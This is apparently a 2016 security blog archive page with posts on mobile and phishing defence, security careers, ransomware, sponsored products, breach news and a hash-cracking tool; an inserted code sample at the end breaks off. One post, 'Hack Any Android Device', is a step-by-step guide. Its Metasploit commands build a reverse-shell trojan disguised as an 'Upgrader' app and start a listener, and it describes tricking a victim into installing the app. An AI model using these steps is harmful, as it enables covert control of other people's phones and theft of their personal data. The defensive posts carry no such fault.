Showing posts with the label EH Security.

5 Best Ways to Secure Mobile Users

As mobile devices have become an essential part of human life, they will soon be used as a tool for employees to enhance their productivity. While workplace flexibility and convenience are increasing, mobile employees are putting enormous amounts of company data at risk. Most of the time employees use third-party applications, ignore security updates and access unprotected network connections, which leaves personal and corporate data at risk and makes them the easiest targets for cyber criminals.

To reduce this risk on the employee side, Alvaro Hoyos, the Chief Information Security Officer at OneLogin, has suggested some tips that will enable organizations to double-check the security of mobile users and employees.



Realistic Security Policies:


Organizations should prefer reliable and realistic policies. If they implement policies that are too rigid for the organization’s maturity, chances are that employees will subvert or ignore them altogether.
Policies should be strict but also workable, so that employees can follow the policy and still get their work done. This is important for mobile users who operate corporate applications on their smartphones or tablets. Policies should be implemented for every device used by employees.

Multifactor authentication:


As many employees access information and work for the organization from remote locations, it is most important to ensure that the right person is using the right information. For that, multi-factor authentication should be used to enforce the access controls.
Hackers are evolving their attack techniques; the only way to protect against unauthorized access is to implement multi-factor authentication for mobile users, which reduces the risk of a hacking incident.

Empower Employee:


Organizations deploy many automated detection systems that alert them to any uncertain or unexpected activity. This process can be extended to the most granular part of the organization: its employees. When employees are empowered to become part of the organization’s detection plan, they get to know about the activities they have direct control over, such as a password change or a login from a new location. This helps the organization make employees part of its early detection plan.

Understanding the Risk of Mobility:

Mobile devices, whether used by employees or by other mobile users, should not be primary devices with complete access, and should not carry confidential organizational information. Organizations should consider how devastating a stolen or misplaced device could be. To overcome this critical issue, mobile users should protect their devices with a trusted SaaS solution. Additionally, documents on mobile systems should be backed up on a daily basis.
Furthermore, policies should define for mobile end users what data can be copied to mobile devices and what data should never leave the organization’s systems.


Continuous Monitoring and tracking:


As employees access systems from mobile devices in huge numbers, it is possible that a device gets lost, stolen or misplaced. For such cases an asset tracking system should be implemented. No doubt these solutions are expensive, but they are worth the investment to protect an organization’s assets from falling into the wrong hands. Devices that are no longer in use or have been lost or stolen need to be tracked as well, in case they reappear on your network.

Even when you know which remote device is doing what from where, threats will still be there. Monitoring is the best option to expose suspicious activity and to prevent employees from entering privileged mode or accessing restricted information. Unauthorized mobile users can be devastating for any organization, so prevention techniques should be implemented to reduce this risk.
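
One way to watch for lost, stolen or retired devices reappearing on the network, as an added example that is not part of the original post: it matches DHCP lease logs against an asset inventory. The log format, the inventory columns and all sample values are constructed for illustration.

```python
"""Flag lost, stolen or retired devices that show up again in network logs."""
import csv
import io
import re
from collections import namedtuple

# Constructed asset inventory (hypothetical schema): MAC address, owner, status.
INVENTORY_CSV = """mac,owner,status
aa:bb:cc:00:00:01,alice,active
aa:bb:cc:00:00:02,bob,lost
aa:bb:cc:00:00:03,carol,retired
aa:bb:cc:00:00:04,dave,stolen
"""

# Constructed DHCP-style log lines (hypothetical format, not a real product's).
SAMPLE_LOG = """\
2016-09-30T08:01:12Z DHCPACK ip=10.0.5.21 mac=AA:BB:CC:00:00:01 host=alice-phone
2016-09-30T08:03:40Z DHCPACK ip=10.0.5.22 mac=AA-BB-CC-00-00-02 host=android-7f3a
2016-09-30T08:04:02Z DHCPACK ip=10.0.5.23 mac=aa:bb:cc:00:00:99 host=unknown
2016-09-30T09:15:27Z DHCPACK ip=10.0.5.24 mac=aabb.cc00.0004 host=tablet
2016-09-30T09:16:00Z DHCPNAK malformed line without a mac field
"""

WATCHED_STATUSES = {"lost", "stolen", "retired"}
LEASE_RE = re.compile(r"^(\S+)\s+DHCPACK\s+ip=(\S+)\s+mac=(\S+)")
Alert = namedtuple("Alert", "timestamp ip mac owner status")


def normalize_mac(raw):
    """Return a lowercase colon-separated MAC, or None if it is not a MAC."""
    digits = re.sub(r"[:.\-]", "", raw).lower()
    if not re.fullmatch(r"[0-9a-f]{12}", digits):
        return None
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def load_inventory(csv_text):
    """Map normalized MAC -> (owner, status) from the inventory CSV."""
    inventory = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        mac = normalize_mac(row["mac"])
        if mac:
            inventory[mac] = (row["owner"], row["status"].strip().lower())
    return inventory


def find_reappearances(log_text, inventory):
    """Return an Alert for every lease granted to a watched device."""
    alerts = []
    for line in log_text.splitlines():
        match = LEASE_RE.match(line)
        if not match:
            continue  # not a granted lease, or malformed: nothing to check
        timestamp, ip, raw_mac = match.groups()
        mac = normalize_mac(raw_mac)
        owner, status = inventory.get(mac, (None, "unknown"))
        if status in WATCHED_STATUSES:
            alerts.append(Alert(timestamp, ip, mac, owner, status))
    return alerts


if __name__ == "__main__":
    for alert in find_reappearances(SAMPLE_LOG, load_inventory(INVENTORY_CSV)):
        print("ALERT %s: %s device of %s (%s) leased %s"
              % (alert.timestamp, alert.status, alert.owner, alert.mac, alert.ip))
```

Current phones often randomize their Wi-Fi MAC address per network, so in practice the same match is better keyed on a device certificate or a management-agent identifier where one is available.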


~ Friday, 30 September 2016 0 comments

Durvasav: Bruteforce Password Cracker

Durvasav is a simple bruteforce password hash cracker written in C. It is a console program released under GNU GPL version 3 and runs on Windows. The tool is used to recover the plain text from standard hashes. It uses the OpenSSL library for generating hashes.



Durvasav allows us to compare thousands of hashes to a hash table at a time. It supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512 standard hashing algorithms. You can also produce hash tables of all these hashes for different character sets or generate wordlists for reverse hash lookup.



Features:

Supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512.
Uses fast OpenSSL library.
Includes wide variety of character sets and a custom character set.
Performs ‘pseudo’ operation.
Hash table generation.
Generates bruteforce password table.
Import and compare hash tables containing thousands of hashes.
Maximum password length of 12 characters (will increase it).
Wordlist generation for all characters.
Compatible with Windows 32bit and 64bit.

You can either choose from predefined character sets or a custom character set of your own.

[0…9] – Numeric from 0-9.
[a…z] – Small letters from a-z.
[A…Z] – Capital letters from A-Z.
[0…z] – 0-9 numeric and a-z alphabets.
[0…Z] – 0-9 numeric and A-Z alphabets.
[a…Z] – All small and capital letters.
[0..a..Z] – All numbers, small letters and capital letters.
[All] – All numbers, small letters, capital letters and all special characters.
[Custom] – Select this if you want to use a custom character set.



~ Tuesday, 27 September 2016 0 comments

Want to become Security Engineer?

The risk of financial and reputation damage caused by a data breach has led to greater demand for security engineers, and a growing skills gap. However, with a growing skills gap comes greater opportunity for a fulfilling and lucrative career as a security engineer.



So the question is: what is a security engineer, and what skills are required to be one?

A typical responsibility for a security engineer includes installing and maintaining hardware and software (firewalls, antivirus, and intrusion detection) to reduce security risks within an organization.

The security engineer role is about building and maintaining IT security solutions that help organizations to stay protected against cyber threats. This differs from a security analyst, who is concerned with organizational awareness, policy and governance risk management.

Skills and Qualification:

In terms of qualifications, a security engineer should have a bachelor’s degree in a technical subject, such as computer science, cyber security, mathematics, engineering or science.

Experience in network security is beneficial, and certification with industry-standard technologies like Juniper, Blue Coat, Checkpoint, Palo Alto Networks, Cisco IOS or Sophos Enterprise Portal would be a bonus. There is also a range of internationally recognized certifications, such as CEH, CISSP and (ISC)².

Tips:

A tip for becoming a security engineer is to start learning new skills straight away. Watch YouTube videos, subscribe to security blogs and keep up to date on recent hacks in the news.

Remember, you don't need a Master's in Cyber Security or ten years' experience to become a security engineer. An enthusiastic attitude and an understanding of the main industry challenges can take you a long way.

Moreover, you can take practical security courses to gain hands-on knowledge. A security engineer needs both a practical and a theoretical background in the security measures used to secure an organization and its information systems.


~ Sunday, 28 August 2016 0 comments

How to win against Phishing attacks?

A Phishing email will typically direct the user to visit a website where they are asked to update personal information, such as a password, credit card, social security, or bank account numbers, that the legitimate organization already has.

Phishing attacks are launched by an attacker from a remote location, using sources that are authentic or look authentic. This leads users to click on the attacker’s links and disclose their personal information.



Attackers can run a phishing campaign that takes only five minutes to put together, and within 25 minutes they get access to corporate data, which can lead to an organization-wide breach.

There are some ways to win against these types of attacks.

Check source of Incoming email:

Your bank or other financial institution will never ask you to give your financial details, passwords or other personal information by email. Never respond to these emails, and in case of any doubt, call your bank for clarification.

Never follow your bank website link from emails:

You should log on to your bank’s website manually instead of following links provided in an email. Such a link may take you to a dummy page that an attacker has created to steal your login information.

Enhance security of your computer:

Being observant is the key to identifying suspicious activity and protecting your computer, but you should also install a good antivirus solution to block these types of attacks. In addition, keep your system and antivirus updated to detect the latest attacks and malware.

Send your sensitive data over private and protected websites only:

Many websites are not secured and collect personal details without any protection. Avoid such websites, and make sure that you are connected to a private and secured network and computer before sending your personal and classified information.

Have any doubt? Don’t risk it:

If you suspect that a website is acting abnormally or redirecting you towards unnecessary pages, stop there and don’t risk your information. This is the most basic technique to avoid phishing attacks.

These are some of the basic techniques to overcome and win against phishing attacks, but organizations also need to create network strategies that restrict users to trusted websites. Additionally, emails should be monitored continuously to block malicious links.


~ Friday, 26 August 2016 0 comments

Why does your security awareness program fail?

The best way to protect organizations from cyber threats is to train employees and conduct an awareness program that enables them to work securely. Risk is everywhere: millions of people become victims of identity theft each year, and the number is rising.

Even the best cyber security solution can’t protect your organization when your employees are unaware of the severity of their routine practices. Regular awareness training can teach them to handle threats at a granular level.



Many organizations fail to provide successful security awareness to their employees. Certain deficiencies in awareness programs contribute to the poor state of awareness in many organizations.

Poor Governance:

The greatest deficiency in most awareness programs is that they focus on what not to do instead of focusing on what employees are supposed to do. Instilling good security-related behavior is the main purpose of an awareness program. In other words, security awareness programs should promote the behaviors defined in governance.

Security policies and procedures are not referred to when conducting day-to-day tasks; this is a major flaw that lets threats go undetected on a routine basis.

Relying on Fear:

In many organizations, the awareness program lacks positive promotion of procedures and techniques. This is a gross mistake that makes a security awareness program a big flop. Organizations are more concerned with frightening employees into adopting the awareness tips; surprisingly, this leaves employees afraid to do their basic routine tasks.

An awareness program should not scare employees; instead, it should make them more confident to look ahead while performing their tasks safely.

The Hacker Mentality:

The main objective of such an awareness program is to tell people how a hacker can hack them and then tell them not to fall victim to it. For example, it will tell you that a hacker can ask for your password over the phone, and that you should not give out your password over the telephone.

The deficiency in telling people specifically what not to do is that the hacker will apply other techniques to acquire passwords. They can ask the employee to modify registry files on the computer, because employees were not told in the awareness program to refuse such requests.

Bad Technical Security:

Users should not be allowed to install software on systems, so that ransomware cannot install itself when a user opens a malicious file. Storage devices should be encrypted, and access to suspicious and unsafe websites should be prohibited.

Even when users are aware of threats and security, neglecting technical security can be dangerous. Technical security works as a second layer behind an end user who is operating securely. Poor technical security allows the inevitable user failure to become a serious incident.

Treating Awareness as an ordinary activity:

When you treat the awareness program as an ordinary activity, you are allowing insecure access to the internet by your own employees. It can be disastrous for the organization if an attacker compromises or tricks a user to gain access.

Making the awareness program a top priority is the only solution to overcome many threats at the initial and base level. Many organizations think it is unnecessary to do so, and the whole scenario changes when they come into contact with a cyber attack.

The underlying problem is that security awareness programs are more difficult to implement than most security professionals want to acknowledge. Implementing a security awareness program effectively requires appropriate knowledge, skills and abilities. Organizations should avoid repeating these common mistakes to make their security awareness program successful.


~ Thursday, 25 August 2016 0 comments

Identify the Gaps in Your Security Strategies

Every day we hear stories about businesses losing critical data; despite billions of dollars invested in cyber security, we have failed to provide foolproof security. We’ve secured our organizations by building layers of walls around networks, applications, storage, identity and devices.



Data security company Vera has identified some shocking gaps in security policies to help enterprises better understand and diagnose their data security loopholes.

Behavioral Gap

According to a breach study by Ponemon, human negligence is responsible for 25% of data breaches globally.

Most of the time, employees avoid using internal systems and software tools for their routine tasks. That is the biggest behavioral gap an organization can have. Employees bypass the secure File Transfer Protocol (FTP) servers by simply copying and pasting data into insecure files and then sending them from their personal email accounts. This is the major gap where the transmission of sensitive data remains undetected by the enterprise security layers.

Visibility Gap

Data is lost when companies are unable to trace where, when and for what purpose the information is being used. The big question is: what is being done with your information by third-party vendors? Most employees receive files unintentionally. If data is regulated, businesses bear responsibility for it, even when they cannot see it.

Control Gap

The ability to lock down access to lost documents is gone once data has slipped away or passed the security layers of the organization. There isn’t any undo button for lost files that revokes access to the information. This is the root cause of many cloud collaboration and storage fears, which need to be addressed before it’s too late.

Response Time Gap

We lose data because of the delay in identifying and responding to incidents and to new technologies that share enterprise data. Many employees do their tasks regardless of the security impact, and information security is left far behind. Enterprises require security that operates at the speed of business, with the flexibility to be adopted by each and every employee and stakeholder.

Mobile Security

The phones and tablets your employees and partners use to access information are the main concern for enterprise security. The security gap is created when employees, customers and partners start using mobile devices for personal use as well. Third-party applications can easily breach the security layer of the organization’s systems and cause information leaks. This gap can be overcome by conducting awareness sessions for each and every stakeholder who deals with the company’s information.

Businesses today simply cannot fill security gaps by following old strategies to secure information. It’s time to look at protecting data throughout its entire life cycle: from its propagation from employees to outside the organization, through applications and devices, and on to wherever that information is being used. That’s the only way we can overcome these gaps and protect information at its best.


~ Saturday, 13 August 2016 0 comments

Secured! Think Again About That Printer in the Corner

In many organizations printers are used very often, and in some they are collecting dust; either way, they are a prime target that can be used as an attack surface. Countless companies don’t bother updating the firmware of their printers, leaving their documents open to attackers. Assets like printers are not even discussed in annual security audits and are assumed to be irrelevant to security.



Printers are seemingly harmless, and that is exactly why they pose a serious threat. Sometimes the best attack vector for an attacker is the one no one bothers to think about. A recent IDC survey found that 35 percent of all security breaches in offices were traced back to an unsecured printer or multi-function device, costing companies $133,800 each year.

Why Should Companies Consider Printers a Security Threat?

Printers are essential assets for businesses, from small organizations to huge corporations, yet they are ignored when it comes to vulnerability management and assessment. Enterprise security tools are meant to protect computers and the network; they often do not block or monitor access from printers. That makes the printer a trouble-free route for the attacker.

Chris Vickery, a white hat hacker and Security Researcher at MacKeeper said: “Getting control of a printer within an organization can provide a foothold for further attacks and a position to ‘pivot’ out of into networks”.

There are serious consequences if a printer is compromised and used by an attacker; for example, attackers can capture every document sent to the printer. That could be a serious compromise of business intelligence that no organization can tolerate.

Preventing Data Loss from Printers

It’s easy to suggest one ultimate security tip to prevent such threats: replace outdated printers with newer models that have the latest security features. Furthermore, data encryption should be introduced in all new printers to prevent data exposure if they are compromised. Although it was adopted by Xerox in March 2016, other companies should also consider introducing this feature in their products.

In the end, as IT administrators are responsible for configuring printers and other multipurpose devices in an organization, they should be aware of the threats associated with those devices, so that serious countermeasures can be taken before data is transmitted.


~ Wednesday, 10 August 2016 0 comments

Threats against the next billion devices

Cyber attacks are not like natural disasters or other forces of nature, nor are they like diseases or other autonomously evolving and spreading agents, at least not yet. They are ultimately driven by human actions, and depend on how people choose to use the communication medium and technology. Economics is the best way to view attacker and defender strategies and how they play out in terms of money. The traditional approach to defense is to raise the cost for your attackers by making attacks as difficult as possible. This, unfortunately, has a tendency to raise costs for the defender and their users too, and does not scale well. The most scalable strategy is to reduce the loss from successful attacks.

What does this look like? The new strategies are already being implemented in many areas of interest, and we will point out where they are being employed successfully. We will further examine the phases of intrusions in financially motivated and state-sponsored attacks to show how defenses based on lowering the value versus raising the cost affect both attackers and defenders. Finally, we will explore strategies for security threats against the next billion devices.




~ Saturday, 23 July 2016 0 comments

How to Protect your Data in the Era of Ransomware

The era of ransomware is upon us. Organizations, small businesses and individuals have been affected by dangerous ransomware attacks in past years. Ransom, which refers to a payment demanded in exchange for the release of someone or something that has been taken, is an effective ploy that has been used by criminals for many years. Locky, a new variant of ransomware, encrypts users’ files and adds a .locky file extension to them, leaving them inaccessible until the ransom is paid. Actively spreading since February 2016, this infection has been the most threatening this year.

Data is the most valuable thing for any individual or organization, so it is understandable that many business owners are rightfully concerned about the rising threat of ransomware. The most important aspects to consider are the steps that common users and professionals should take to protect organization and personal data from these ransomware attacks.



'No malware is pleasant, but there is something truly awful about ransomware. Paying the ransom is not just a declaration of defeat, but also a confession that preventative measures weren't taken. Cybersecurity awareness, a robust email security solution, internet monitoring software, and protecting your endpoints will go a long way to better prevent ransomware,' says Sergio Galindo, President and COO of GFI Software, a company creating solutions that allow companies to protect from various cyber threats.

Over the last few years, several software companies have released solutions which can protect your organization from ransomware threats such as Locky. These solutions bring the protection against malicious email attacks and ensure that every employee’s web browsing and downloading is secure.
The solutions provided by GFI Software are not limited to organizations; individual users and small businesses can also use the software. GFI WebMonitor allows you to monitor and control your web activity and to manage the internet usage of your employees, so that no unsafe websites can be accessed from your corporate network. GFI MailEssentials will help you and your organization fight ransomware attacks coming through email. The solution enables effective spam filtering and blocks emails containing malware like Locky.

Organizations need to reshape their cyber security policies, if they want to stay ahead of new ransomware threats. Deploying the necessary security solutions with immediate effect is the only way to secure the precious data of an organization.


I partnered with the brand to write this article but every word is mine

~ Wednesday, 20 July 2016 0 comments

Hack Your Website First Before Hackers Do. Beat Them at Their Game

In recent years, website and web application release cycles have become increasingly short. Initially, these short release cycles were a result of companies attempting to remain competitive — offering more feature-rich applications and responding to consumers demands more quickly.

As a result, end-users have largely been conditioned to expect a continual flow of updates and new releases — companies have gone so far as to publish software development roadmaps so their customers can be kept apprised of what to expect in the immediate and near-term releases.

While short release cycles and frequent updates are often seen as a positive, there is also a dark side that needs to be considered. One of the first casualties in the “race to release” is web application security. In an attempt to launch websites and ship web applications as efficiently as possible, security has become an afterthought.

Despite the risks associated with a potential security breach (something we covered in this post), web application security often takes a backseat to revenue, profit and customer satisfaction. Given that a 100% secure web application is an impossibility, that might seem like a reasonable approach. After all, security is rarely considered an issue until it’s too late.


One potential solution to this problem is to spend time looking at your website or web application from the perspective of a hacker — in essence, figure out how to hack your website before someone else does.

The Hacker’s Mentality: Why And How?

There is a saying (concept) that floats around web application security circles called “Hack Your Website First”. The idea behind this saying is one which promotes a more proactive approach to security. As we mentioned in the opening paragraphs, web application security is often an afterthought — that is, until an application is hacked. Of course, by then it’s usually too late. The damage has been done.

“Hack your website first” seeks to develop the mindset in which developers and security professionals actively seek out potential vulnerabilities in web applications the same ways that a hacker would. It’s an approach that makes a lot of sense — if you can learn to think like the enemy, you stand a much greater chance of defeating them.

Ask yourself: How would your overall security posture improve if you were to take a day or two away from the development process and look for ways to hack your website or web application?

Think Like a Hacker


Often, two of the most significant obstacles when it comes to managing web application security are understanding:

1.    Which are the primary vulnerabilities that hackers are looking to exploit?
2.    What tools and techniques are they using to not only find but exploit those vulnerabilities?

Understanding which vulnerabilities are most commonly exploited is the first step in learning to think like a hacker. The most commonly exploited vulnerabilities are those of the technical variety. For example, cross-site scripting (XSS), SQL Injection and command injection.

Obviously, logical vulnerabilities should also be an important consideration. But in reality, they are often less susceptible to attack simply because they are more time intensive to exploit and require a greater level of expertise.

If you are someone who finds analogies to be useful, look at securing technical vulnerabilities as the equivalent of locking all the doors and windows on the ground floor of your house before going to bed. Logical vulnerabilities, on the other hand, are more in line with a burglar setting up a step-ladder, climbing on the roof of your home and looking for an open skylight. It’s possible but less likely to happen. You can read the differences between technical and logical web application vulnerabilities for more detailed information.

Act Like a Hacker

Hackers are people too. That means that they have all the traits and tendencies of developers and programmers. If there is an easier or more proficient way of completing a task, they’ll take advantage of it.

You may be inclined to think that hackers spend hours on end searching for vulnerabilities, but they’re smarter than that. More often than not, hackers are using automated tools and scripts to find and exploit vulnerabilities. Tools like sqlmap, sqlninja, Canvas, BruteXSS and Core Impact are often used in the process of identifying and exploiting vulnerabilities. These tools reduce the amount of time and effort that hackers need to expend and vastly increase their reach.

If you think that your web application is unlikely to be a target of hacking, think again. The target itself is rarely relevant. Hackers are looking for access to your server resources and bandwidth. If you pay for it, hackers are happy to take it from you.

If you’re going to put forth an honest attempt to hack your websites or web applications, you’ll need to employ tools and techniques that are similar to the hackers. Using an automated web scanner is one of the best (and easiest) ways to scan one or even hundreds of websites and web applications.

Using the right tools also means that once a vulnerability is identified, the process of remediation should be largely automated. Flagging the vulnerability, assigning it to a developer for patching, re-testing and reporting can all be automated by a capable web application vulnerability scanner.

Know Thy Enemy (Hackers)

In The Art of War, Sun Tzu stated that “If you know the enemy and know yourself, you need not fear the result of a hundred battles”.

By learning to hack your website or web application first, you'll develop an intimate knowledge of the tools, vulnerabilities and exploits that are often used by hackers.


Staying ahead of hackers and eliminating all web vulnerabilities before they can be exploited can prove to be a challenging task. To a large extent, one of the most effective ways of reducing potential attack vectors is by being proactive: think and act like a hacker to beat them at their own game.

~ Monday, 11 July 2016 0 comments

Cyber Security Career Guide



What is a Cyber Security Specialist?

Cyber security specialists work with companies to secure computer systems. They ask staff about their current security methods. They inspect the whole system and classify the company’s data by severity. They find out what information needs protection. Cyber security specialists are also responsible for defining access levels for employees, that is, what information should be accessible to a specific user. Security specialists use their findings to plan security policies and strategies. They regularly train staff on how to use security software and how to use computers properly to prevent cyber attacks.



Specialists evaluate security breaches and determine whether there are problems or errors. If there is a problem, specialists track where the breach came from and shut off the access point.

Why Become a Cyber Security Specialist?

The cyber security field is expected to grow faster than the average rate. An increase in cyber security jobs is expected as technology continues to advance and attackers remain highly active. More businesses will go online, which requires cyber security plans and strategies to secure them.

Education Path:

There are many ways to become a cyber security specialist. Many employers prefer to hire people with a formal university background, such as a bachelor’s degree in computer science majoring in information security. Another route is self-study followed by certification.

An important part of preparing for this field is learning the latest technology. Some people learn through classes, and others teach themselves through online courses and tutorials.

Formal Studies: 

Many people choose a formal degree plan to become specialized. For them, a Master’s in Cyber Security is the best they can choose. Another degree for becoming a cyber security specialist, which is more practice-based, is Information Security Assurance.

Certificates:

As with other computer science degrees, certificates increase your appeal to employers. A bachelor’s degree alone won’t teach you cyber security in depth, so self-study, tutorials, online courses and certifications will lead you towards specialization.
Some recommended courses are:

Certified Ethical Hacker (CEH)
Certified Information Systems Security Professional (CISSP)
Certified Network Defense Architect (CNDA)
Certified Network Security Administrator (NSA)

Many of these courses are available and taught online at highly affordable rates, to help overcome the shortage of cyber security professionals in a world of growing security threats.


Salary and Wages
The increasing need for cyber security professionals has raised the average salary for the field. An average security consultant earns $50,000+ annually. The average annual salary is $60,000. This shows the demand companies have for cyber security professionals.



Once you’ve got a cyber security career in mind, we recommend you do a quick search for that job on major employment sites (SimplyHired, Monster, Indeed, etc.). This will give you a sense of what kinds of current qualifications, certifications and degrees employers want to see.

However, the lists of hard skills and certifications are not written in stone. They’re simply suggested starting points. You may find some of them unnecessary; you may require more specialized skills for your dream job. Again, feel free to take away what you find useful.


~ Tuesday, 5 July 2016 0 comments

Hack Any Android Device

Android devices are widely used around the world, and their applications make the platform the choice of millions of users. Because these devices are used by so many people, hackers exploit them to harm users and steal personal data.



In this tutorial we are going to learn how to hack any Android device with Kali Linux. This tutorial explains it step by step:

Step 1:

Open a terminal, and make a Trojan.apk
You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)



Step 2:
Open another terminal until the file is being produced.
Load metasploit console, by typing : msfconsole




Step 3:
After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler



Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
To set Lhost type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)



Step 4:

At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to your android phone.
Send it to victim’s device and let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
And when he clicks Open, exploit will run and you will get access.





However, the option to allow installation of apps from Unknown Sources must be enabled; if it is not, go to the security settings of the Android phone to allow the Trojan to install. This exploit has one condition: the victim must install and open the Trojan you sent, which is what allows you to enter the victim’s device.

Follow these simple steps and exploit any Android device.


~ Saturday, 2 July 2016 1 comment

OurMine Hacked CEO of Google and Others

Earlier this month, we heard that Facebook CEO Mark Zuckerberg’s Twitter, Instagram and Pinterest accounts were hacked by the hacker group “OurMine”. The hackers taunted “Hey @finkd we got access to your Twitter, Instagram and Pinterest, we are just testing your security, please DM us”. This news revealed a major security breach affecting the accounts of different celebrities.


Google CEO Sundar Pichai has become the latest victim of the hacking group “OurMine” after his Twitter-linked Quora account was compromised and filled with spam links and posts.


After many spam posts appeared on these accounts, the breach became public, as the accounts have many followers. The OurMine group said it managed to breach Pichai’s account by exploiting a zero-day vulnerability in Quora. However, Quora has not yet responded about this flaw.

Surprisingly, OurMine has set up a website that offers a range of vulnerability scanning services, with a refund policy if the service doesn’t work. In a short message they said “We are just testing people security, we never change their passwords, and we did it because there are other hackers who can hack them and change everything”.


It is believed that the hackers are using old data dumps and also drawing on recent breaches and information leaks. Old passwords and credentials that are still being used by many celebrities and individuals are the main factor behind these attacks.

A hacker, “AlexPro”, has exposed the hacker group “OurMine” by releasing the IP address and location they are operating from. The group appears to be Arab, as the traced location is Saudi Arabia.



However, it is likely the team is using Tor and a VPN to remain untraceable, as both are used to route internet traffic around the globe to hide the actual location.

Regarding the rapid succession of breaches on many social media sites, a Twitter spokesperson told the BBC: “A number of other online services have seen millions of passwords stolen in the past several weeks, and we know far too many people use the same password for multiple things online. We recommend people use a unique, strong password for Twitter”.

So it is highly recommended to use a different password for each of your accounts on the internet to secure yourself to some extent.


~ Monday, 27 June 2016 0 comments

Russia Demands Backdoor to Monitor Chats on Messaging App

Cyber security threats in Russia and its neighbors in the west are escalating. In the past few years, Russia has violated many land borders through unannounced crossings, disregarding their privacy. Russia has been developing and employing offensive cyber capabilities for years. Russian cyber attack groups consist of professionals, highly skilled practitioners whose daily jobs are to prepare and carry out cyber attacks.


Recently, the Russian government has been planning to pass a new mass surveillance bill, which would allow the Russian Federal Security Service to monitor the chats of every single messaging application in Russia.

In this bill, they demand a backdoor into every messaging app. The providers of apps like WhatsApp, Viber, Telegram and others are required to provide the necessary backdoors to the government or they could face a fine of up to 1 million rubles.

The bill was proposed by Russian Senator Elena Mizulina, who said on a TV show that she is deeply concerned about the closed chatrooms on messaging apps, where teenagers are being targeted and brainwashed by extremists into carrying out criminal activities and attacks.

This bill would help the Russian government monitor every messaging app to detect chats that are suspicious or related to terrorism. The bill has already been approved by the Duma (Russia’s lower legislative house), and if this legislation is passed into law, each and every messaging app must follow the law and provide backdoors to the government or face a fine.

This bill also states that the citizens who complies decrypting electronic communication will face a fine range between 3000-5000 rubles, while officials who stand in the way can potentially be fined 30,000-50,000 rubles.

As we already know, WhatsApp has implemented end-to-end encryption to secure users’ communication from intruders. Viber has also announced this feature for its messenger, but after this law the government will be able to monitor all applications, including those with end-to-end encryption. These applications now have to choose whether to make their services unavailable after this law or to provide backdoors and compromise their customers’ privacy.


~ Wednesday, 22 June 2016 0 comments

How to protect your confidentiality and prevent data leakage

In this modern era, data security is a big issue that every organization is facing. As time passes, the security threats to every organization are increasing. Many businesses have suffered huge financial losses in the past few years because of the leakage of their confidential data.

Even the world’s most powerful government officials aren’t safe from these modern-day security threats. Hillary Clinton, a candidate in the next presidential election in the United States, suffered from data leakage when her emails were compromised.


During the past 12 months some of the world’s biggest organizations and governments, like Anthem, MySpace, the Syrian Government, and the Philippines Commission on Elections, were targeted. Sometimes it’s attacks like these where your hands are tied and you can’t do anything to prevent them.
However, there are many other ways that lead to accidental leakage of your organization’s data. Researchers have identified email as one of the biggest sources of data leakage in this modern era. Since email took over from postal mail as the primary medium of communication between organizations, the security risk has rapidly increased.

The confidentiality of a business is something you can’t take risks with. Historically, we have seen that once a business’s confidential information and its client database are leaked, the only thing that follows is huge financial losses. It doesn’t matter if you are a lawyer, a health care institute, a bank or some multinational chain: the risk of data leakage through email is always on the high side if proper measures aren’t in place.

SafeSend is one of the most trusted software products for securing your data from accidental leakage. Some of the world’s top organizations, like Samsung, Allianz and EPSON, have already put in place security measures that will prevent any accidental leakage of data about their business activities. Those businesses that aren’t considering accidental data leakage a security threat are sitting on a time bomb and waiting for it to explode. All it takes is a common mistake by an employee to leak the organization’s confidential data, and sometimes it can be on purpose if your employee is disgruntled about something.

Making a security move in this era of cyber security can only increase the satisfaction level of your clients. After all, everyone wants to know how secure they are while connected with your business. SafeSend will be the perfect solution to increase your organization’s security measures along with the level of satisfaction of your top clients. We always suggest to our readers and followers the best possible cyber security solutions available in the industry. SafeSend has a proven record and, with most of its business activities in the U.S. and Britain, it is the market leader in preventing accidental data leakage.



I partnered with the brand to write this article but every word is mine

~ Thursday, 9 June 2016 0 comments

The Outcome of the Notorious TeamViewer Hack


Over the past few months, users of TeamViewer, a remote access service, have been discussing their experience of being ransacked by attackers who somehow gained access to their accounts. In many of the cases, online thieves reportedly drained users’ PayPal and other bank accounts. No one knows the exact number of accounts hacked yet, but there’s no denying that TeamViewer is breached.


For more than a month, many social media sites and blogs have received numerous such reports. Many claimed that intrusions were the reason for this failure, which has affected many others.

The attackers made transactions and shopped online using users’ PayPal and bank details; many users caught this and rolled back the transactions, but many were left helpless. Nick Bradley, a security researcher at IBM, reported his experience: "In the middle of my gaming session, I lose control of my mouse and the Teamviewer window pops up in the bottom right corner of my screen. As soon as I realize what is happening, I kill the application. Then it dawns on me: I have other machines running Team Viewer!"

He continued:

“I run downstairs where another computer is still up and running. Lo and behold, the Teamviewer window shows up. Before I am able to kill it, the attacker opens a browser window and attempts to go to a new web page. As soon as I reach the machine, I revoke control and close the app. I immediately go to the Team Viewer website and changed my password while also enabling two-factor authentication. Lucky for me, those were the only two machines that were still powered on with Team Viewer installed. Also lucky for me is the fact that I was there when it occurred. Had I not been there to thwart the attack, who knows what would have been accomplished. Instead of discussing how I almost got hacked, I’d be talking about the serious implications of my personal data leak.”

The concern is that if personal data is taken or a bank transaction is performed without being noticed, it is unclear who is responsible for the losses. That has made TeamViewer users feel insecure and has left them with a bad impression.






 


These statements led TeamViewer to announce two measures in response to the huge number of reported hijackings. The first measure, “Trusted Devices”, ensures that the account holder must explicitly confirm that a new device is trusted before it is granted access to an existing account for the first time.

The second measure is “Data Integrity”, which provides automatic monitoring that detects when an account has been hacked. "The system determines continuously if your Teamviewer account shows unusual behavior (e.g. access from a new location) that might suggest it has been compromised," said Axel Schmidt, the spokesperson for TeamViewer.
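The two measures described above can be sketched as follows. This is an added example, not TeamViewer's code and not part of the original post; the Account fields, function names and sample events are hypothetical and constructed for illustration.

```python
from dataclasses import dataclass, field

@dataclass
class Account:
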